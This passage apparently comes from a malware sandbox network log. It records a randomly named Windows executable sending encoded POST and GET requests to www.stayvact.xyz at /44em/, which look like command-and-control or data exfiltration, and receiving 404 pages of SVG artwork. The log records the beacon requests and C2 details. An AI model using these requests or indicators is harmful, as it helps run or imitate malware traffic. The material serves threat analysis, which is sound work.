                                                                                                                                                    Oct 4, 2024 11:58:48.665107012 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="
                                                                                                                                                    Oct 4, 2024 11:58:48.665175915 CEST1289INData Raw: 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73
                                                                                                                                                    Data Ascii: <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-line
                                                                                                                                                    Oct 4, 2024 11:58:48.665241957 CEST1289INData Raw: 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35
                                                                                                                                                    Data Ascii: 2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="u
                                                                                                                                                    Oct 4, 2024 11:58:48.665309906 CEST1289INData Raw: 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46
                                                                                                                                                    Data Ascii: 3.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.37
                                                                                                                                                    Oct 4, 2024 11:58:48.665376902 CEST1289INData Raw: 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35
                                                                                                                                                    Data Ascii: .66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="
                                                                                                                                                    Oct 4, 2024 11:58:48.849589109 CEST1289INData Raw: 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: 269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="roun


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    11192.168.11.2049743199.192.19.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:51.187577009 CEST6909OUTPOST /44em/ HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stayvact.xyz
                                                                                                                                                    Referer: http://www.stayvact.xyz/44em/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 76 45 6d 57 71 78 73 46 45 59 46 6d 30 68 52 73 78 4b 79 51 61 55 42 7a 64 69 57 78 34 45 6d 30 4a 67 33 30 75 44 58 43 2b 41 63 5a 6d 2b 69 37 34 52 5a 52 64 4c 79 50 75 54 79 4a 70 73 4a 63 2f 50 6e 58 69 6d 72 4d 51 6f 54 6a 64 4d 30 44 32 7a 49 33 68 33 66 74 6c 7a 56 32 50 69 47 35 39 77 68 59 58 44 4f 43 34 51 53 4e 46 79 69 53 65 55 2f 57 79 5a 4c 4b 71 38 6d 38 51 50 52 62 6e 57 48 79 46 62 48 73 6f 68 6b 6a 6b 6f 48 33 6d 57 73 5a 62 54 58 6b 6a 45 49 2f 79 41 55 2f 64 4b 47 73 4c 39 55 76 52 74 59 47 31 50 30 51 56 44 4e 48 73 57 2f 79 71 42 56 2f 62 31 69 45 43 5a 31 63 79 79 56 4b 4d 65 36 32 54 49 6f 43 5a 55 68 2f 49 54 2b 56 7a 58 45 6d 59 58 49 75 67 75 51 45 46 34 50 57 4c 66 57 67 52 48 53 72 48 36 39 71 4c 33 43 2f 74 61 30 69 66 45 62 2b 54 66 65 35 57 58 65 7a 32 33 4e 58 62 49 51 4d 6d 70 74 69 41 57 4e 63 39 64 69 45 4f 2b 2f 33 39 46 50 51 36 78 59 71 31 73 6a 50 67 6d 73 32 66 66 38 51 54 42 57 4f 6b 66 2b 72 77 4c 75 70 54 34 51 38 36 52 6d 50 2b 55 4d 33 37 31 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm0hRsxKyQaUBzdiWx4Em0Jg30uDXC+AcZm+i74RZRdLyPuTyJpsJc/PnXimrMQoTjdM0D2zI3h3ftlzV2PiG59whYXDOC4QSNFyiSeU/WyZLKq8m8QPRbnWHyFbHsohkjkoH3mWsZbTXkjEI/yAU/dKGsL9UvRtYG1P0QVDNHsW/yqBV/b1iECZ1cyyVKMe62TIoCZUh/IT+VzXEmYXIuguQEF4PWLfWgRHSrH69qL3C/ta0ifEb+Tfe5WXez23NXbIQMmptiAWNc9diEO+/39FPQ6xYq1sjPgms2ff8QTBWOkf+rwLupT4Q86RmP+UM371RdjN2co6OSWSQUmcL8/pOrjFKuQWuJLG79+193GB1J2I/PvScELmOJaqg1WydZA1XiedynGilmZDoDd2xpSyUVkE6C+pt6aUcjD/irxvNIMlogfATLEEUwnQV4YRuZIMDpuzEoBvELo8m9bZvwydXfmEse0djTVVZVNdN9qefNojINcgJZu7pGBpT6DyM4LE7/EWcol0OXkTVbZ1wV7EbU43ZEZ4A8o9xUcsjb4BpHKbbgmNdDnpYN1PyCcsyqWN2HIvwNizZyggwb7/6Lc1cEJbrGgAmn1qIrqKp3rsIGRUAdPawd34QNAVdcM355tV7h9zeTLAEnkdgE90s0hrLHU9QLAbDWDSNOfTS6Ne0iDn9aA4C2Hlhuu/dT49uTS4ne0cPYdhG71qfT5sByCbudZ4vVJWO+wEuitq41gKvZqOylAcxh67pMhWtHJ1sG3KjUzED9ryhkKMWVqtjEdc8gS+OyADZohrBo63BFifQWnt9N2bwls4MA+EFlFNuFmqMWfKpD0VQvmKbjvW5vs8cUgr1sCOEEP9u6E3GjH3Op/aKaNWaJe/b4NB7XjZntWVCJqAuUCIrcXn+aQPbxBCLFW7mH1iYEm1qATFbmyOutwhZ847MCtpfRcf43zqAG2ukZGf6WhX7HpXcV3oAaXtmRakToC3XYsTAC [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:51.398381948 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:51 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:51.398509026 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32
                                                                                                                                                    Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380
                                                                                                                                                    Oct 4, 2024 11:58:51.398605108 CEST1289INData Raw: 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73
                                                                                                                                                    Data Ascii: ="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="sta
                                                                                                                                                    Oct 4, 2024 11:58:51.398682117 CEST1289INData Raw: 31 33 35 22 20 79 31 3d 22 31 33 32 2e 37 34 36 22 20 78 32 3d 22 33 32 30 2e 31 33 35 22 20 79 32 3d 22 31 35 33 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65
                                                                                                                                                    Data Ascii: 135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" />
                                                                                                                                                    Oct 4, 2024 11:58:51.398782015 CEST1289INData Raw: 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20
                                                                                                                                                    Data Ascii: "10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945"
                                                                                                                                                    Oct 4, 2024 11:58:51.398890018 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="
                                                                                                                                                    Oct 4, 2024 11:58:51.398994923 CEST1289INData Raw: 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73
                                                                                                                                                    Data Ascii: <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-line
                                                                                                                                                    Oct 4, 2024 11:58:51.399096012 CEST1289INData Raw: 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35
                                                                                                                                                    Data Ascii: 2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="u
                                                                                                                                                    Oct 4, 2024 11:58:51.399164915 CEST1289INData Raw: 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46
                                                                                                                                                    Data Ascii: 3.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.37
                                                                                                                                                    Oct 4, 2024 11:58:51.399382114 CEST1289INData Raw: 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35
                                                                                                                                                    Data Ascii: .66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="
                                                                                                                                                    Oct 4, 2024 11:58:51.584820986 CEST1289INData Raw: 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: 269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="roun


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    12192.168.11.2049744199.192.19.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:53.902379036 CEST426OUTGET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 11:58:54.103954077 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:54 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:54.104049921 CEST1289INData Raw: 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33
                                                                                                                                                    Data Ascii: 301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,
                                                                                                                                                    Oct 4, 2024 11:58:54.104196072 CEST1289INData Raw: 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20
                                                                                                                                                    Data Ascii: city="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g>
                                                                                                                                                    Oct 4, 2024 11:58:54.104330063 CEST1289INData Raw: 20 20 20 20 20 20 20 78 31 3d 22 33 32 30 2e 31 33 35 22 20 79 31 3d 22 31 33 32 2e 37 34 36 22 20 78 32 3d 22 33 32 30 2e 31 33 35 22 20 79 32 3d 22 31 35 33 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                    Data Ascii: x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="1
                                                                                                                                                    Oct 4, 2024 11:58:54.104345083 CEST1289INData Raw: 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d
                                                                                                                                                    Data Ascii: oke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636
                                                                                                                                                    Oct 4, 2024 11:58:54.104460955 CEST1289INData Raw: 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20
                                                                                                                                                    Data Ascii: 10" x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x
                                                                                                                                                    Oct 4, 2024 11:58:54.104475021 CEST1289INData Raw: 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                                                    Data Ascii: > <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width=
                                                                                                                                                    Oct 4, 2024 11:58:54.104660034 CEST1289INData Raw: 79 3d 22 35 33 30 2e 39 32 33 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33
                                                                                                                                                    Data Ascii: y="530.923" r="2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spacema
                                                                                                                                                    Oct 4, 2024 11:58:54.104772091 CEST1289INData Raw: 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63
                                                                                                                                                    Data Ascii: mit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="2
                                                                                                                                                    Oct 4, 2024 11:58:54.104818106 CEST1289INData Raw: 09 09 09 4d 33 30 31 2e 33 30 31 2c 33 34 37 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39
                                                                                                                                                    Data Ascii: M301.301,347.66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" s
                                                                                                                                                    Oct 4, 2024 11:58:54.289161921 CEST1289INData Raw: 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 4c 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34
